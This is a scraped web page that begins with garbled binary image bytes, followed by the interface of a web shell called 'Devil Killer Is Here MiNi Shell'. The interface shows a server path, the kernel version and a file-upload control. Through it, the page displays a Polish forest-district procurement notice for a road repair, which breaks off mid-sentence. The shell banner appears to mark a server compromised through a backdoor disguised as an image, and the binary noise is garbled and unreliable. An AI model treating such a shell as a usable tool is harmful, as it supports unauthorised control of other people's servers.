JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211001/0019980401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> REMONT DROGI LEŚNEJ JANOWO </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa – Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Lidzbark</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130014398</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lidzbark-Nadleśnictwo 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lidzbark</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">13-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">236961512</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">236963161</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lidzbark@olsztyn.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lidzbark.olsztyn.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> REMONT DROGI LEŚNEJ JANOWO </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8c234d3-22b1-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00199804</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_lidzbark <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu platformazakupowa.pl, adres<br/>https://platformazakupowa.pl/pn/lasy_lidzbark.<br/>Za datę przekazania oferty przyjmuje się datę jej przekazania w systemie poprzez kliknięcie przycisku<br/>Złóż ofertę w drugim kroku i wyświetlaniu komunikatu, że oferta została złożona. Czas wyświetlany na<br/>platformazakupowa.pl synchronizuje się automatycznie z serwerem Głównego Urzędu Miar.<br/>Wykonawca składa ofertę w postępowaniu za pośrednictwem Formularza składania oferty lub wniosku<br/>dostępnego na platformazakupowa.pl. w postępowaniu w sprawie udzielenia zamówienia publicznego.<br/>komunikacja w postępowaniu pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>dokumentów, oświadczeń, wniosków , zawiadomień, zapytań oraz przekazywanie informacji odbywa<br/>się elektronicznie za pośrednictwem platformazakupowa.pl i formularza Wyślij wiadomość.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenia<br/>zamówienia publicznego lub konkursie (DZ. U. z 2020 r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo-aplikacyjne umożliwiające pracę na platformie zakupowej (platformazakupowa.pl) tj.<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>- komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje;<br/>- zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.;<br/>- włączona obsługa JavaScript;<br/>- zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>- szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.;<br/>- oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10 plików<br/>lub spakowanych folderów przy maksymalnej wielkości 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest nadleśniczy – Dariusz Szczawiński.<br/>21.2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>21.3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich<br/>wniesienia.<br/>21.4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone<br/>wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są<br/>obowiązane do zachowania ich w poufności<br/>21.5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu<br/>zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania<br/>postępowania o udzielenie zamówienia i jego archiwizacji.<br/>21.6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania<br/>zostanie udostępniona w oparciu o przepisy PZP.<br/>21.7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego.<br/>21.8. Niezależnie od postanowień pkt 21.7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>21.9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i<br/>konsultingowe,<br/>21.10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w<br/>sposób zautomatyzowany.<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP,związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych określa PZP.<br/>21.13. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21<br/>RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą<br/>prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>21.14. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub<br/>innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do<br/>podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osoba, której dotyczą pozyskane w związku z<br/>prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie<br/>dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu<br/>oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty polegające na remoncie drogi leśnej Janowo o numerze inwentarzowym 220/610 w leśnictwie Kiełpiny, dz. nr 3157, 3158, 3159,2, 3156/1, 3160/1 obręb Nowe Grodziczno, gm. Grodziczno, pow. nowomiejscki, woj. warmińsko-mazurskie. Doga na kilometrażu od km 0+000 do 2+603. <br/><br/><br/>Szczegółowy opis i zakres prac objętych przedmiotem zamówienia określa dokumentacja techniczna stanowiąca załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>1) Cena – 60 %<br/>2) Gwarancja - 40 %<br/>16.2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych,<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (załącznik nr<br/>1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i<br/>usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w tej ofercie ceny, kwotę<br/>podatku od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Gwarancja” punkty zostaną przyznane w następujący sposób:<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium,przyjmuje się 40 pkt.<br/>okres gwarancji z badanej oferty<br/>Liczba punktów w kryterium okres gwarancji = ------------------------------------- x 40% x 100<br/>najdłuższy oferowany okres<br/>Zamawiający zastrzega, że okres gwarancji w tym kryterium nie może być krótszy niż 24 miesiące.<br/>Okres gwarancji powyżej 60 miesięcy nie będzie brany pod uwagę w tym kryterium.<br/>Za udzielenie gwarancji powyżej 60 miesięcy wykonawca uzyska maksymalną liczbę punktów w tym<br/>kryterium, a do porównania z innymi ofertami zostanie przyjęte, że wykonawca udziela 60 –<br/>miesięcznego okresu gwarancji. W przypadku gdy wykonawca w formularzu ofertowym nie określi<br/>okresu udzielonej gwarancji zamawiający uzna, iż wykonawca udzieli minimalnej wymaganej gwarancji<br/>tj. 24 miesięcy.<br/>Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania obowiązku podatkowego<br/>dla zamawiającego, zgodnie z przepisami o podatku od towarów i usług, doliczy do przedstawionej w<br/>niej ceny należny podatek od towarów i usług zgodnie z tymi przepisami prawa.<br/>16.4. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do<br/>dwóch miejsc po przecinku.<br/>16.5. Zamawiający nie przewiduje aukcji elektronicznej.<br/>16.6. Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą sumę<br/>punktów uzyskanych w ww. kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów.<br/>16.7. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wezwie<br/>Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert<br/>dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia, mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i<br/>spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia wymagań w zakresie opisu spełniania tego warunku udziału w<br/>postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów.<br/>Zamawiający nie stawia wymagań w zakresie opisu spełniania tego warunku udziału w<br/>postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Za spełnienie warunku dotyczącego sytuacji ekonomicznej lub finansowej Zamawiający uzna<br/>posiadanie przez Wykonawcę ubezpieczenia odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>mniejszą niż 200 000,00 zł.<br/>Ocena spełniania przez Wykonawcę niniejszego warunku nastąpi na podstawie dokumentów<br/>wskazanych w Rozdziale 9 pkt. 1 SWZ.<br/>4) zdolności technicznej lub zawodowej (doświadczenie zawodowe, potencjał kadrowy)<br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a) wykonał w sposób należyty w okresie ostatnich 5 lat przed upływem terminu składania ofert (a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przynajmniej jedną robotę<br/>budowlaną w zakresie dróg o wartości min. 300 000,00 zł brutto;<br/>Ocena spełniania przez Wykonawcę niniejszego warunku nastąpi na podstawie dokumentów<br/>wskazanych w Rozdziale 9 pkt 1 oraz pkt 4 lit a i b SWZ.<br/>b) dysponuje lub będzie dysponował co najmniej jedną osobą, która będzie pełnić funkcję<br/>kierownika budowy przy realizacji przedmiotowego zamówienia, z uprawnieniami do<br/>wykonywania samodzielnych funkcji w budownictwie o specjalności drogowej zgodnie z<br/>przepisami ustawy z dnia 7.07.1994 r. Prawo budowlane tj. z dnia 7 lipca 2020 r. (Dz.U. z 2020 r.<br/>poz. 1333 ze zm.). Zamawiający dopuszcza odpowiadające im uprawnienia, wydane w innych<br/>niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, obywatelom państw<br/>Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.<br/>12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22.12.2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej tj. z 13 grudnia 2019 r. (Dz.U. z 2020 r. poz. 220).<br/>Ocena spełniania przez Wykonawcę niniejszego warunku nastąpi na podstawie dokumentów<br/>wskazanych w Rozdziale 9 pkt 1 oraz 4 lit c SWZ<br/>7.2. Na podstawie art. 116 ust. 2 PZP Zamawiający może, na każdym etapie postępowania,<br/>uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę<br/>sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć<br/>negatywny wpływ na realizację zamówienia.<br/>7.3. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>7.4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>7.5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli 